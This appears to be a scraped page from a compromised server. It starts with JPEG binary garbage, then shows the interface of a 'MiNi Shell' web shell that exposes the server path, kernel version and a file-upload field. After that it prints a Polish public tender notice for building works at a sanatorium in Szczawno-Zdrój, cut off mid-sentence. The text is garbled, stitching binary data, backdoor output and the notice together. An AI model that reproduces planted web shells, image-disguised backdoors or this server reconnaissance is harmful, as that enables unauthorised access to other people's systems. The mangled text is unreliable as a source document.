JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220415/0012438402-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie hydroizolacji oraz prac rozbiórkowych i konstrukcyjnych w obiekcie sanatoryjnym „Anka” w Szczawnie Zdroju przy ul. Wojska Polskiego 6 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uzdrowisko Szczawno-Jedlina S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczawno-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mfajek@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczawno-jedlina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie hydroizolacji oraz prac rozbiórkowych i konstrukcyjnych w obiekcie sanatoryjnym „Anka” w Szczawnie Zdroju przy ul. Wojska Polskiego 6 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0cce1a0a-bc97-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00124384</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.htm</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się za pomocą środka komunikacji elektronicznej, tj. platformy do elektronicznej obsługi zamówień<br/>publicznych Zamawiającego dostępnej pod adresem: https://szczawnojedlina.<br/>logintrade.net/rejestracja/ustawowe.html<br/>Wykonawca zobowiązany jest składać wszystkie dokumenty (oferty oraz oświadczenia) pod rygorem<br/>nieważności opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe<br/>złożenie na Platformie dostępnej pod adresem https://szczawnojedlina.<br/>logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy<br/>zgodnym z niniejszym postępowaniem. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na platformie. Wykonawca posiadający konto na Platformie zakupowej<br/>https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html ma dostęp do możliwości złożenia,<br/>zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ<br/>oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Instrukcji korzystania z Platformy na:<br/>https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 17 października 2018 r. w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów<br/>elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów<br/>dokumentów, jakich może żądać zamawiający od Wykonawcy w postępowaniu o udzielenie<br/>zamówienia.Regulamin korzystania z Platformy zakupowej znajduje się pod adresem: https://szczawnojedlina.<br/>logintrade.net/rejestracja/ustawowe.html Zamawiający nie przewiduje sposobu komunikowania się z<br/>Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z<br/>dnia4 maja2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1. administratorem Pani/Pana<br/>danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A.2. administrator wyznaczył Inspektora<br/>Danych Osobowych, z którym można się kontaktować P. Magdalena Motyl, Tel.: 74 8493150<br/>emailsekretariat@szczawno-jedlina.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie<br/>art.6ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie przetargu nieograniczonego.4. odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawyPZP5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.<br/>1PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8.posiada Pani/Pan :a.na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku,<br/>gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku<br/>może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);b.<br/>na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą<br/>PZP oraz nie może naruszać integralności protokołu oraz jego załączników);c. na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz<br/>przypadków, o których mowa wart. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);d. prawo do wniesienia skargi<br/>doPrezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;9. nie przysługuje Pani/Panu: a. w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych ;b. prawo do<br/>przenoszenia danych osobowych, o którym mowa w art.20 RODO; c.na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO;10.przysługuje Pani/Panu prawo wniesienia skargi do<br/>organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z<br/>dnia4 maja2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1. administratorem Pani/Pana<br/>danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A.2. administrator wyznaczył Inspektora<br/>Danych Osobowych, z którym można się kontaktować P. Magdalena Motyl, Tel.: 74 8493150<br/>emailsekretariat@szczawno-jedlina.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie<br/>art.6ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie przetargu nieograniczonego.4. odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawyPZP5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.<br/>1PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8.posiada Pani/Pan :a.na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku,<br/>gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku<br/>może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);b.<br/>na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą<br/>PZP oraz nie może naruszać integralności protokołu oraz jego załączników);c. na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz<br/>przypadków, o których mowa wart. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);d. prawo do wniesienia skargi<br/>doPrezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;9. nie przysługuje Pani/Panu: a. w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych ;b. prawo do<br/>przenoszenia danych osobowych, o którym mowa w art.20 RODO; c.na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO;10.przysługuje Pani/Panu prawo wniesienia skargi do<br/>organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 6/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 530580,88 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie hydroizolacji oraz prac rozbiórkowych i konstrukcyjnych w obiekcie sanatoryjnym „Anka” w Szczawnie Zdroju przy ul. Wojska Polskiego 6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert <br/><br/>Nr	Nazwa kryterium	Waga %	Sposób punktowania - minimalizacja <br/>1 Cena brutto	60%	Liczba punktów (C) =(cena najniższa zaproponowana w ofertach /cena badanej oferty) x 60<br/>3	Okres gwarancji 40%	Okres gwarancji: 36 mcy – 0 pkt (jako spełnienie minimum). Do 60 mcy (i więcej) - max 20 pkt. liczone wg. wzoru (dany okres gwarancji liczony jako ilość miesięcy ponad 36mcy / max okres gwarancji powyżej 36 mcy tj. 24 mcy.) x 40 np. dany okres gwarancji 48 mcy. – ilość punktów liczymy jako: (12/24)x40= 20 pkt<br/><br/><br/>Oferty będą oceniane następująco:<br/>	Kryterium 1 – najtańsza cenowo oferta uzyska 60 pkt, pozostałe proporcjonalnie mniej.<br/>- Kryterium 2– zgodnie z punktacją.<br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Oferty.<br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2.       – waga      %<br/>     <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym: Zamawiający nie wymaga przedstawienia osobnych dowodów na<br/>potwierdzenie tego warunku<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie tego warunku<br/>3. sytuacji ekonomicznej lub finansowej: Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie<br/>tego warunku<br/>4. zdolności technicznej lub zawodowej:<br/>a)	Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. Nr 7) w powyższym zakresie i przy spełnieniu powyższych warunków - wykonanie min. 1 roboty podobnego rodzaju (tj wykonanie robót budowlanych zawierających minimalnie elementy: budowy/przebudowy/remontu dachu, wykonania hydroizolacji ścian- dotyczącej obiektu wpisanego do rejestru zabytków) na kwotę sumaryczną min. 500 000 zł brutto.<br/><br/>Uwaga - zgodnie z udzielonymi odpowiedziami Zamawiający dopuszcza i uzna za spełnienie ww. warunku udziału w postępowaniu jeżeli Wykonawca wykaże wykonanie w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, min. 1 roboty podobnego rodzaju (tj. wykonanie robót budowlanych zawierających minimalne elementy: budowy/przebudowy/remontu dachu,– dotyczącej obiektu wpisanego do rejestru zabytków) na kwotę sumaryczną min. 500 000 zł brutto, oraz min. 1 roboty podobnego rodzaju (tj. wykonania robót budowlanych zawierających minimalne elementy: wykonania hydroizolacji ścian – dotyczącej obiektu wpisanego do rejestru zabytków) na kwotę sumaryczną min. 500 000 zł brutto.<br/><br/>b)Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za 